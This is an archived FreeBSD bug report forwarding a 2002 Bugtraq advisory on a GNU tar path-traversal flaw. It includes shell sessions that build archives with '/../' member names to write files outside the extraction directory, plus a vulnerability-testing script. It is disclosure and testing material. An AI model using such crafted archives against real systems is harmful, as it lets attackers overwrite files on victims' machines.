Site Navigation

Date:      Tue, 1 Oct 2002 22:19:56 -0700 (PDT)
From:      Brett Glass <brett@lariat.org>
To:        freebsd-gnats-submit@FreeBSD.org
Subject:   bin/43575: tar leaves system susceptible to maliciously crafted archives
Message-ID:  <200210020519.g925JuII015384@www.freebsd.org>

---

next in thread | raw e-mail | index | archive | help

---

>Number:         43575
>Category:       bin
>Synopsis:       tar leaves system susceptible to maliciously crafted archives
>Confidential:   no
>Severity:       serious
>Priority:       high
>Responsible:    freebsd-bugs
>State:          open
>Quarter:        
>Keywords:       
>Date-Required:
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Tue Oct 01 22:20:02 PDT 2002
>Closed-Date:
>Last-Modified:
>Originator:     Brett Glass
>Release:        4.6.2
>Organization:
>Environment:
>Description:
FreeBSD's tar appears to be susceptible to the problem mentioned
in the attached message from Bugtraq:

Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 17532 invoked from network); 26 Sep 2002 23:50:32 -0000
X-Authentication-Warning: datacontact.hu: boldi owned process doing -bs
Date: Fri, 27 Sep 2002 02:11:07 +0200 (CEST)
From: Bencsath Boldizsar <bencsath.boldizsar@mail2002.ebizlab.hit.bme.hu>
X-X-Sender: boldi@datacontact.hu
To: bugtraq@securityfocus.com
Subject: Allot Netenforcer problems, GNU TAR flaw
Message-ID: <Pine.LNX.4.44.0209270208190.21585-100000@datacontact.hu>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=iso-8859-2
Content-Transfer-Encoding: 8BIT
X-Virus-Scanned: by amavis-dc
X-UIDL: 04e05b0b2a906d53883806bcadcee73b

Security Advisory, case study - Netenforcer

1.Multiple security flaws lead to Netenforcer privilege escalation
2.Vulnerable tar packages

[Netenforcer material snipped]

2. Description of the "tar" problem

Creating a tar file with -P option one can put any file names in the tar
file. While unpacking such tar files, tar is designed to remove leading
slash. Other security feature of the tar package is to deny deployment of
any files whose name contains "dotdot" (".."). A bug in the tar package
leads to a security flaw:
"../something" is denied by tar
"/something" leading slash is removed
"/../something"  leading slash removed but ".." is NOT denied
"./../something" ".." is NOT denied.

Although we found this bug by studying tar, we found that this bug has
been found by others, we should give them credit:

check out:

From: Mark J Cox (mjc@redhat.com)
Subject: [SECURITY] bug in contains_dot_dot routine
Newsgroups: gnu.utils.bug
Date: 2002-05-27 03:45:07 PST
by
Mark J Cox / Red Hat / OpenSSL / Apache Software Foundation

and

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1267

While this bug can affect systems with antivirus products (amavis is not
affected) or any systems like the before mentioned, we think that a "more
rapid" answer to such "small" security problems is needed.
As You have seen: Small bugs can lead to a whole system crack.

Tar - Affected software versions:
GNU tar is affected, but e.g. SunOS tar does not do any sanity check.

Debian:
tar 1.13.17-2  NOT vulnerable (-)
tar 1.13.25-3 (unstable) IS vulnerable (+)
tar 1.13.25-2 (unstable) IS vulnerable (+)
Suse 7.3
tar 1.13.18 NOT vulnerable
Suse 6.4
tar 1.13.17 NOT vulnerable
Netenforcer:
tar (in software 4.2) IS vulnerable

others: unknown

Sample session:

echo "foo bar" >/tmp/zz/b
echo "foo bar" >/tmp/zz/b2
echo "foo bar" >/tmp/zz/b3
echo "foo bar" >a

boldi@boldi:/tmp/b$ tar cfv b.tar a ../../../../../../../tmp/zz/b  -P
a
./../../../../../../tmp/zz/b
boldi@boldi:/tmp/b$ rm /tmp/zz/b
boldi@boldi:/tmp/b$ tar xfv b.tar
a
./../../../../../../tmp/zz/b
tar: ../../../../../../../tmp/zz/b: Member name contains `..'
tar: Error exit delayed from previous errors
boldi@boldi:/tmp/b$ls -la /tmp/zz/b
ls: /tmp/zz/b: No such file or directory
#note - this is O.K. , if found ".." in the name

#session 2:
boldi@boldi:/tmp/b$ tar cfv b2.tar a /tmp/zz/b2 -P
a
/tmp/zz/b2
boldi@boldi:/tmp/b$ rm /tmp/zz/b2
boldi@boldi:/tmp/b$ tar xfv b2.tar
a
/tmp/zz/b2
tar: Removing leading `/' from member names
boldi@boldi:/tmp/b$ ls -la /tmp/zz/b2
ls: /tmp/zz/b2: No such file or directory
boldi@boldi:/tmp/b$ ls -la /tmp/b/tmp/zz/b2
-rw-rw-r--    1 boldi    boldi          10 sze  8 12:47 /tmp/b/tmp/zz/b2


boldi@boldi:/tmp/b$ tar cfv b3.tar a /////tmp/zz/b3 -P
a
/////tmp/zz/b3
boldi@boldi:/tmp/b$ rm /tmp/zz/b3
boldi@boldi:/tmp/b$ tar xfv b3.tar
a
/////tmp/zz/b3
tar: Removing leading `/////' from member names
boldi@boldi:/tmp/b$ ls -la /tmp/zz/b3
ls: /tmp/zz/b3: No such file or directory
#session 2 is o.k.


#session 3:
boldi@boldi:/tmp/b$ echo "try this one. boldi." >/tmp/zz/final
boldi@boldi:/tmp/b$ tar cfv bolditry.tar a
/../../../../../../tmp/zz/final -Pa
/../../../../../../tmp/zz/final
boldi@boldi:/tmp/b$ rm /tmp/zz/final
boldi@boldi:/tmp/b$ ls -la /tmp/zz/final
ls: /tmp/zz/final: No such file or directory
boldi@boldi:/tmp/b$ tar xfv bolditry.tar
a
/../../../../../../tmp/zz/final
tar: Removing leading `/' from member names
boldi@boldi:/tmp/b$ ls -la /tmp/zz/final
-rw-rw-r--    1 boldi    boldi          21 sze  8 13:03 /tmp/zz/final
#session 3: vulnerable.

####Attachment: small script testing Your tar too#######
TAR=/usr/bin/tar
DIR=/tmp
#tar problem tester by boldi

cd $DIR
mkdir foo
cd foo
echo "boldi" >bar
cd $DIR
mkdir tartest
cd tartest
$TAR cfv boldi.tar /../../../../../../../$DIR/foo/bar -P
rm $DIR/foo/bar
if [ -f $DIR/foo/bar ] ; then
        echo "something went wrong with the test";

else
        $TAR xfv boldi.tar 2>&1
        if [ -f $DIR/foo/bar ] ; then
                echo "Your tar is vulnerable";
        else
                echo "Your tar is NOT vulnerable or error occoured";
        fi;
fi
cd $DIR
rm foo/bar
rmdir foo
rm tartest/boldi.tar
rmdir tartest
##############end of attachment##########################


Boldizsar Bencsath
Dept. of Telecommunications
Budapest University of Technology and Economics
H-1111 Budapest, Magyar tudósok körútja 2. I ép. E.429.
email: bencsath.boldizsar@mail2002.ebizlab.hit.bme.hu

>How-To-Repeat:
      
>Fix:
      
>Release-Note:
>Audit-Trail:
>Unformatted:

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-bugs" in the body of the message

---

Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?200210020519.g925JuII015384>

Legal Notices | © 1995-2024 The FreeBSD Project. All rights reserved.

Contact